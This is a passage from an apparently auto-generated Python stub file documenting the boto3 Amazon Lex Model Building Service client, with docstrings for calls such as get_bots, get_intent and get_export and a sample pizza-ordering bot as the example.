'type': 'Facebook'|'Slack'|'Twilio-Sms'|'Kik',
'botConfiguration': {
'string': 'string'
},
'status': 'IN_PROGRESS'|'CREATED'|'FAILED',
'failureReason': 'string'
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
botChannelAssociations (list) --
An array of objects, one for each association, that provides information about the Amazon Lex bot and its association with the channel.
(dict) --
Represents an association between an Amazon Lex bot and an external messaging platform.
name (string) --
The name of the association between the bot and the channel.
description (string) --
A text description of the association you are creating.
botAlias (string) --
An alias pointing to the specific version of the Amazon Lex bot to which this association is being made.
botName (string) --
The name of the Amazon Lex bot to which this association is being made.
Note
Currently, Amazon Lex supports associations with Facebook and Slack, and Twilio.
createdDate (datetime) --
The date that the association between the Amazon Lex bot and the channel was created.
type (string) --
Specifies the type of association by indicating the type of channel being established between the Amazon Lex bot and the external messaging platform.
botConfiguration (dict) --
Provides information necessary to communicate with the messaging platform.
(string) --
(string) --
status (string) --
The status of the bot channel.
CREATED - The channel has been created and is ready for use.
IN_PROGRESS - Channel creation is in progress.
FAILED - There was an error creating the channel. For information about the reason for the failure, see the failureReason field.
failureReason (string) --
If status is FAILED , Amazon Lex provides the reason that it failed to create the association.
nextToken (string) --
A pagination token that fetches the next page of associations. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of associations, specify the pagination token in the next request.
Exceptions
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'botChannelAssociations': [
{
'name': 'string',
'description': 'string',
'botAlias': 'string',
'botName': 'string',
'createdDate': datetime(2015, 1, 1),
'type': 'Facebook'|'Slack'|'Twilio-Sms'|'Kik',
'botConfiguration': {
'string': 'string'
},
'status': 'IN_PROGRESS'|'CREATED'|'FAILED',
'failureReason': 'string'
},
],
'nextToken': 'string'
}
:returns:
(string) --
(string) --
"""
pass
def get_bot_versions(name=None, nextToken=None, maxResults=None):
"""
Gets information about all of the versions of a bot.
The GetBotVersions operation returns a BotMetadata object for each version of a bot. For example, if a bot has three numbered versions, the GetBotVersions operation returns four BotMetadata objects in the response, one for each numbered version and one for the $LATEST version.
The GetBotVersions operation always returns at least one version, the $LATEST version.
This operation requires permissions for the lex:GetBotVersions action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_bot_versions(
name='string',
nextToken='string',
maxResults=123
)
:type name: string
:param name: [REQUIRED]\nThe name of the bot for which versions should be returned.\n
:type nextToken: string
:param nextToken: A pagination token for fetching the next page of bot versions. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of versions, specify the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of bot versions to return in the response. The default is 10.
:rtype: dict
ReturnsResponse Syntax
{
'bots': [
{
'name': 'string',
'description': 'string',
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
bots (list) --
An array of BotMetadata objects, one for each numbered version of the bot plus one for the $LATEST version.
(dict) --
Provides information about a bot. .
name (string) --
The name of the bot.
description (string) --
A description of the bot.
status (string) --
The status of the bot.
lastUpdatedDate (datetime) --
The date that the bot was updated. When you create a bot, the creation date and last updated date are the same.
createdDate (datetime) --
The date that the bot was created.
version (string) --
The version of the bot. For a new bot, the version is always $LATEST .
nextToken (string) --
A pagination token for fetching the next page of bot versions. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of versions, specify the pagination token in the next request.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'bots': [
{
'name': 'string',
'description': 'string',
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
def get_bots(nextToken=None, maxResults=None, nameContains=None):
"""
Returns bot information as follows:
This operation requires permission for the lex:GetBots action.
See also: AWS API Documentation
Exceptions
Examples
This example shows how to get a list of all of the bots in your account.
Expected Output:
:example: response = client.get_bots(
nextToken='string',
maxResults=123,
nameContains='string'
)
:type nextToken: string
:param nextToken: A pagination token that fetches the next page of bots. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of bots, specify the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of bots to return in the response that the request will return. The default is 10.
:type nameContains: string
:param nameContains: Substring to match in bot names. A bot will be returned if any part of its name matches the substring. For example, 'xyz' matches both 'xyzabc' and 'abcxyz.'
:rtype: dict
ReturnsResponse Syntax
{
'bots': [
{
'name': 'string',
'description': 'string',
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
bots (list) --
An array of botMetadata objects, with one entry for each bot.
(dict) --
Provides information about a bot. .
name (string) --
The name of the bot.
description (string) --
A description of the bot.
status (string) --
The status of the bot.
lastUpdatedDate (datetime) --
The date that the bot was updated. When you create a bot, the creation date and last updated date are the same.
createdDate (datetime) --
The date that the bot was created.
version (string) --
The version of the bot. For a new bot, the version is always $LATEST .
nextToken (string) --
If the response is truncated, it includes a pagination token that you can specify in your next request to fetch the next page of bots.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
Examples
This example shows how to get a list of all of the bots in your account.
response = client.get_bots(
maxResults=5,
nextToken='',
)
print(response)
Expected Output:
{
'bots': [
{
'version': '$LATEST',
'name': 'DocOrderPizzaBot',
'createdDate': 1494360160.133,
'description': 'Orders a pizza from a local pizzeria.',
'lastUpdatedDate': 1494360160.133,
'status': 'NOT_BUILT',
},
],
'ResponseMetadata': {
'...': '...',
},
}
:return: {
'bots': [
{
'name': 'string',
'description': 'string',
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
:returns:
nextToken (string) -- A pagination token that fetches the next page of bots. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of bots, specify the pagination token in the next request.
maxResults (integer) -- The maximum number of bots to return in the response that the request will return. The default is 10.
nameContains (string) -- Substring to match in bot names. A bot will be returned if any part of its name matches the substring. For example, "xyz" matches both "xyzabc" and "abcxyz."
"""
pass
def get_builtin_intent(signature=None):
"""
Returns information about a built-in intent.
This operation requires permission for the lex:GetBuiltinIntent action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_builtin_intent(
signature='string'
)
:type signature: string
:param signature: [REQUIRED]\nThe unique identifier for a built-in intent. To find the signature for an intent, see Standard Built-in Intents in the Alexa Skills Kit .\n
:rtype: dict
ReturnsResponse Syntax{
'signature': 'string',
'supportedLocales': [
'en-US'|'en-GB'|'de-DE',
],
'slots': [
{
'name': 'string'
},
]
}
Response Structure
(dict) --
signature (string) --The unique identifier for a built-in intent.
supportedLocales (list) --A list of locales that the intent supports.
(string) --
slots (list) --An array of BuiltinIntentSlot objects, one entry for each slot type in the intent.
(dict) --Provides information about a slot used in a built-in intent.
name (string) --A list of the slots defined for the intent.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'signature': 'string',
'supportedLocales': [
'en-US'|'en-GB'|'de-DE',
],
'slots': [
{
'name': 'string'
},
]
}
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
def get_builtin_intents(locale=None, signatureContains=None, nextToken=None, maxResults=None):
"""
Gets a list of built-in intents that meet the specified criteria.
This operation requires permission for the lex:GetBuiltinIntents action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_builtin_intents(
locale='en-US'|'en-GB'|'de-DE',
signatureContains='string',
nextToken='string',
maxResults=123
)
:type locale: string
:param locale: A list of locales that the intent supports.
:type signatureContains: string
:param signatureContains: Substring to match in built-in intent signatures. An intent will be returned if any part of its signature matches the substring. For example, 'xyz' matches both 'xyzabc' and 'abcxyz.' To find the signature for an intent, see Standard Built-in Intents in the Alexa Skills Kit .
:type nextToken: string
:param nextToken: A pagination token that fetches the next page of intents. If this API call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of intents, use the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of intents to return in the response. The default is 10.
:rtype: dict
ReturnsResponse Syntax
{
'intents': [
{
'signature': 'string',
'supportedLocales': [
'en-US'|'en-GB'|'de-DE',
]
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
intents (list) --
An array of builtinIntentMetadata objects, one for each intent in the response.
(dict) --
Provides metadata for a built-in intent.
signature (string) --
A unique identifier for the built-in intent. To find the signature for an intent, see Standard Built-in Intents in the Alexa Skills Kit .
supportedLocales (list) --
A list of identifiers for the locales that the intent supports.
(string) --
nextToken (string) --
A pagination token that fetches the next page of intents. If the response to this API call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of intents, specify the pagination token in the next request.
Exceptions
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'intents': [
{
'signature': 'string',
'supportedLocales': [
'en-US'|'en-GB'|'de-DE',
]
},
],
'nextToken': 'string'
}
:returns:
(string) --
"""
pass
def get_builtin_slot_types(locale=None, signatureContains=None, nextToken=None, maxResults=None):
"""
Gets a list of built-in slot types that meet the specified criteria.
For a list of built-in slot types, see Slot Type Reference in the Alexa Skills Kit .
This operation requires permission for the lex:GetBuiltInSlotTypes action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_builtin_slot_types(
locale='en-US'|'en-GB'|'de-DE',
signatureContains='string',
nextToken='string',
maxResults=123
)
:type locale: string
:param locale: A list of locales that the slot type supports.
:type signatureContains: string
:param signatureContains: Substring to match in built-in slot type signatures. A slot type will be returned if any part of its signature matches the substring. For example, 'xyz' matches both 'xyzabc' and 'abcxyz.'
:type nextToken: string
:param nextToken: A pagination token that fetches the next page of slot types. If the response to this API call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of slot types, specify the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of slot types to return in the response. The default is 10.
:rtype: dict
ReturnsResponse Syntax
{
'slotTypes': [
{
'signature': 'string',
'supportedLocales': [
'en-US'|'en-GB'|'de-DE',
]
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
slotTypes (list) --
An array of BuiltInSlotTypeMetadata objects, one entry for each slot type returned.
(dict) --
Provides information about a built in slot type.
signature (string) --
A unique identifier for the built-in slot type. To find the signature for a slot type, see Slot Type Reference in the Alexa Skills Kit .
supportedLocales (list) --
A list of target locales for the slot.
(string) --
nextToken (string) --
If the response is truncated, the response includes a pagination token that you can use in your next request to fetch the next page of slot types.
Exceptions
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'slotTypes': [
{
'signature': 'string',
'supportedLocales': [
'en-US'|'en-GB'|'de-DE',
]
},
],
'nextToken': 'string'
}
:returns:
(string) --
"""
pass
def get_export(name=None, version=None, resourceType=None, exportType=None):
"""
Exports the contents of a Amazon Lex resource in a specified format.
See also: AWS API Documentation
Exceptions
:example: response = client.get_export(
name='string',
version='string',
resourceType='BOT'|'INTENT'|'SLOT_TYPE',
exportType='ALEXA_SKILLS_KIT'|'LEX'
)
:type name: string
:param name: [REQUIRED]\nThe name of the bot to export.\n
:type version: string
:param version: [REQUIRED]\nThe version of the bot to export.\n
:type resourceType: string
:param resourceType: [REQUIRED]\nThe type of resource to export.\n
:type exportType: string
:param exportType: [REQUIRED]\nThe format of the exported data.\n
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'version': 'string',
'resourceType': 'BOT'|'INTENT'|'SLOT_TYPE',
'exportType': 'ALEXA_SKILLS_KIT'|'LEX',
'exportStatus': 'IN_PROGRESS'|'READY'|'FAILED',
'failureReason': 'string',
'url': 'string'
}
Response Structure
(dict) --
name (string) --
The name of the bot being exported.
version (string) --
The version of the bot being exported.
resourceType (string) --
The type of the exported resource.
exportType (string) --
The format of the exported data.
exportStatus (string) --
The status of the export.
IN_PROGRESS - The export is in progress.
READY - The export is complete.
FAILED - The export could not be completed.
failureReason (string) --
If status is FAILED , Amazon Lex provides the reason that it failed to export the resource.
url (string) --
An S3 pre-signed URL that provides the location of the exported resource. The exported resource is a ZIP archive that contains the exported resource in JSON format. The structure of the archive may change. Your code should not rely on the archive structure.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'name': 'string',
'version': 'string',
'resourceType': 'BOT'|'INTENT'|'SLOT_TYPE',
'exportType': 'ALEXA_SKILLS_KIT'|'LEX',
'exportStatus': 'IN_PROGRESS'|'READY'|'FAILED',
'failureReason': 'string',
'url': 'string'
}
:returns:
IN_PROGRESS - The export is in progress.
READY - The export is complete.
FAILED - The export could not be completed.
"""
pass
def get_import(importId=None):
"""
Gets information about an import job started with the StartImport operation.
See also: AWS API Documentation
Exceptions
:example: response = client.get_import(
importId='string'
)
:type importId: string
:param importId: [REQUIRED]\nThe identifier of the import job information to return.\n
:rtype: dict
ReturnsResponse Syntax{
'name': 'string',
'resourceType': 'BOT'|'INTENT'|'SLOT_TYPE',
'mergeStrategy': 'OVERWRITE_LATEST'|'FAIL_ON_CONFLICT',
'importId': 'string',
'importStatus': 'IN_PROGRESS'|'COMPLETE'|'FAILED',
'failureReason': [
'string',
],
'createdDate': datetime(2015, 1, 1)
}
Response Structure
(dict) --
name (string) --The name given to the import job.
resourceType (string) --The type of resource imported.
mergeStrategy (string) --The action taken when there was a conflict between an existing resource and a resource in the import file.
importId (string) --The identifier for the specific import job.
importStatus (string) --The status of the import job. If the status is FAILED , you can get the reason for the failure from the failureReason field.
failureReason (list) --A string that describes why an import job failed to complete.
(string) --
createdDate (datetime) --A timestamp for the date and time that the import job was created.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'name': 'string',
'resourceType': 'BOT'|'INTENT'|'SLOT_TYPE',
'mergeStrategy': 'OVERWRITE_LATEST'|'FAIL_ON_CONFLICT',
'importId': 'string',
'importStatus': 'IN_PROGRESS'|'COMPLETE'|'FAILED',
'failureReason': [
'string',
],
'createdDate': datetime(2015, 1, 1)
}
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
def get_intent(name=None, version=None):
"""
Returns information about an intent. In addition to the intent name, you must specify the intent version.
This operation requires permissions to perform the lex:GetIntent action.
See also: AWS API Documentation
Exceptions
Examples
This example shows how to get information about an intent.
Expected Output:
:example: response = client.get_intent(
name='string',
version='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the intent. The name is case sensitive.\n
:type version: string
:param version: [REQUIRED]\nThe version of the intent.\n
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'description': 'string',
'slots': [
{
'name': 'string',
'description': 'string',
'slotConstraint': 'Required'|'Optional',
'slotType': 'string',
'slotTypeVersion': 'string',
'valueElicitationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'priority': 123,
'sampleUtterances': [
'string',
],
'responseCard': 'string',
'obfuscationSetting': 'NONE'|'DEFAULT_OBFUSCATION'
},
],
'sampleUtterances': [
'string',
],
'confirmationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'followUpPrompt': {
'prompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
}
},
'conclusionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'dialogCodeHook': {
'uri': 'string',
'messageVersion': 'string'
},
'fulfillmentActivity': {
'type': 'ReturnIntent'|'CodeHook',
'codeHook': {
'uri': 'string',
'messageVersion': 'string'
}
},
'parentIntentSignature': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string'
}
Response Structure
(dict) --
name (string) --
The name of the intent.
description (string) --
A description of the intent.
slots (list) --
An array of intent slots configured for the intent.
(dict) --
Identifies the version of a specific slot.
name (string) --
The name of the slot.
description (string) --
A description of the slot.
slotConstraint (string) --
Specifies whether the slot is required or optional.
slotType (string) --
The type of the slot, either a custom slot type that you defined or one of the built-in slot types.
slotTypeVersion (string) --
The version of the slot type.
valueElicitationPrompt (dict) --
The prompt that Amazon Lex uses to elicit the slot value from the user.
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
priority (integer) --
Directs Lex the order in which to elicit this slot value from the user. For example, if the intent has two slots with priorities 1 and 2, AWS Lex first elicits a value for the slot with priority 1.
If multiple slots share the same priority, the order in which Lex elicits values is arbitrary.
sampleUtterances (list) --
If you know a specific pattern with which users might respond to an Amazon Lex request for a slot value, you can provide those utterances to improve accuracy. This is optional. In most cases, Amazon Lex is capable of understanding user utterances.
(string) --
responseCard (string) --
A set of possible responses for the slot type used by text-based clients. A user chooses an option from the response card, instead of using text to reply.
obfuscationSetting (string) --
Determines whether a slot is obfuscated in conversation logs and stored utterances. When you obfuscate a slot, the value is replaced by the slot name in curly braces ({}). For example, if the slot name is "full_name", obfuscated values are replaced with "{full_name}". For more information, see Slot Obfuscation .
sampleUtterances (list) --
An array of sample utterances configured for the intent.
(string) --
confirmationPrompt (dict) --
If defined in the bot, Amazon Lex uses prompt to confirm the intent before fulfilling the user\'s request. For more information, see PutIntent .
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
rejectionStatement (dict) --
If the user answers "no" to the question defined in confirmationPrompt , Amazon Lex responds with this statement to acknowledge that the intent was canceled.
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
followUpPrompt (dict) --
If defined in the bot, Amazon Lex uses this prompt to solicit additional user activity after the intent is fulfilled. For more information, see PutIntent .
prompt (dict) --
Prompts for information from the user.
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
rejectionStatement (dict) --
If the user answers "no" to the question defined in the prompt field, Amazon Lex responds with this statement to acknowledge that the intent was canceled.
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
conclusionStatement (dict) --
After the Lambda function specified in the fulfillmentActivity element fulfills the intent, Amazon Lex conveys this statement to the user.
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
dialogCodeHook (dict) --
If defined in the bot, Amazon Amazon Lex invokes this Lambda function for each user input. For more information, see PutIntent .
uri (string) --
The Amazon Resource Name (ARN) of the Lambda function.
messageVersion (string) --
The version of the request-response that you want Amazon Lex to use to invoke your Lambda function. For more information, see using-lambda .
fulfillmentActivity (dict) --
Describes how the intent is fulfilled. For more information, see PutIntent .
type (string) --
How the intent should be fulfilled, either by running a Lambda function or by returning the slot data to the client application.
codeHook (dict) --
A description of the Lambda function that is run to fulfill the intent.
uri (string) --
The Amazon Resource Name (ARN) of the Lambda function.
messageVersion (string) --
The version of the request-response that you want Amazon Lex to use to invoke your Lambda function. For more information, see using-lambda .
parentIntentSignature (string) --
A unique identifier for a built-in intent.
lastUpdatedDate (datetime) --
The date that the intent was updated. When you create a resource, the creation date and the last updated date are the same.
createdDate (datetime) --
The date that the intent was created.
version (string) --
The version of the intent.
checksum (string) --
Checksum of the intent.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
Examples
This example shows how to get information about an intent.
response = client.get_intent(
version='$LATEST',
name='DocOrderPizza',
)
print(response)
Expected Output:
{
'version': '$LATEST',
'name': 'DocOrderPizza',
'checksum': 'ca9bc13d-afc8-4706-bbaf-091f7a5935d6',
'conclusionStatement': {
'messages': [
{
'content': 'All right, I ordered you a {Crust} crust {Type} pizza with {Sauce} sauce.',
'contentType': 'PlainText',
},
{
'content': 'OK, your {Crust} crust {Type} pizza with {Sauce} sauce is on the way.',
'contentType': 'PlainText',
},
],
'responseCard': 'foo',
},
'confirmationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'Should I order your {Crust} crust {Type} pizza with {Sauce} sauce?',
'contentType': 'PlainText',
},
],
},
'createdDate': 1494359783.453,
'description': 'Order a pizza from a local pizzeria.',
'fulfillmentActivity': {
'type': 'ReturnIntent',
},
'lastUpdatedDate': 1494359783.453,
'rejectionStatement': {
'messages': [
{
'content': 'Ok, I'll cancel your order.',
'contentType': 'PlainText',
},
{
'content': 'I cancelled your order.',
'contentType': 'PlainText',
},
],
},
'sampleUtterances': [
'Order me a pizza.',
'Order me a {Type} pizza.',
'I want a {Crust} crust {Type} pizza',
'I want a {Crust} crust {Type} pizza with {Sauce} sauce.',
],
'slots': [
{
'name': 'Type',
'description': 'The type of pizza to order.',
'priority': 1,
'sampleUtterances': [
'Get me a {Type} pizza.',
'A {Type} pizza please.',
'I'd like a {Type} pizza.',
],
'slotConstraint': 'Required',
'slotType': 'DocPizzaType',
'slotTypeVersion': '$LATEST',
'valueElicitationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'What type of pizza would you like?',
'contentType': 'PlainText',
},
{
'content': 'Vegie or cheese pizza?',
'contentType': 'PlainText',
},
{
'content': 'I can get you a vegie or a cheese pizza.',
'contentType': 'PlainText',
},
],
},
},
{
'name': 'Crust',
'description': 'The type of pizza crust to order.',
'priority': 2,
'sampleUtterances': [
'Make it a {Crust} crust.',
'I'd like a {Crust} crust.',
],
'slotConstraint': 'Required',
'slotType': 'DocPizzaCrustType',
'slotTypeVersion': '$LATEST',
'valueElicitationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'What type of crust would you like?',
'contentType': 'PlainText',
},
{
'content': 'Thick or thin crust?',
'contentType': 'PlainText',
},
],
},
},
{
'name': 'Sauce',
'description': 'The type of sauce to use on the pizza.',
'priority': 3,
'sampleUtterances': [
'Make it {Sauce} sauce.',
'I'd like {Sauce} sauce.',
],
'slotConstraint': 'Required',
'slotType': 'DocPizzaSauceType',
'slotTypeVersion': '$LATEST',
'valueElicitationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'White or red sauce?',
'contentType': 'PlainText',
},
{
'content': 'Garlic or tomato sauce?',
'contentType': 'PlainText',
},
],
},
},
],
'ResponseMetadata': {
'...': '...',
},
}
:return: {
'name': 'string',
'description': 'string',
'slots': [
{
'name': 'string',
'description': 'string',
'slotConstraint': 'Required'|'Optional',
'slotType': 'string',
'slotTypeVersion': 'string',
'valueElicitationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'priority': 123,
'sampleUtterances': [
'string',
],
'responseCard': 'string',
'obfuscationSetting': 'NONE'|'DEFAULT_OBFUSCATION'
},
],
'sampleUtterances': [
'string',
],
'confirmationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'followUpPrompt': {
'prompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
}
},
'conclusionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'dialogCodeHook': {
'uri': 'string',
'messageVersion': 'string'
},
'fulfillmentActivity': {
'type': 'ReturnIntent'|'CodeHook',
'codeHook': {
'uri': 'string',
'messageVersion': 'string'
}
},
'parentIntentSignature': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string'
}
:returns:
(string) --
"""
pass
def get_intent_versions(name=None, nextToken=None, maxResults=None):
"""
Gets information about all of the versions of an intent.
The GetIntentVersions operation returns an IntentMetadata object for each version of an intent. For example, if an intent has three numbered versions, the GetIntentVersions operation returns four IntentMetadata objects in the response, one for each numbered version and one for the $LATEST version.
The GetIntentVersions operation always returns at least one version, the $LATEST version.
This operation requires permissions for the lex:GetIntentVersions action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_intent_versions(
name='string',
nextToken='string',
maxResults=123
)
:type name: string
:param name: [REQUIRED]\nThe name of the intent for which versions should be returned.\n
:type nextToken: string
:param nextToken: A pagination token for fetching the next page of intent versions. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of versions, specify the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of intent versions to return in the response. The default is 10.
:rtype: dict
ReturnsResponse Syntax
{
'intents': [
{
'name': 'string',
'description': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
intents (list) --
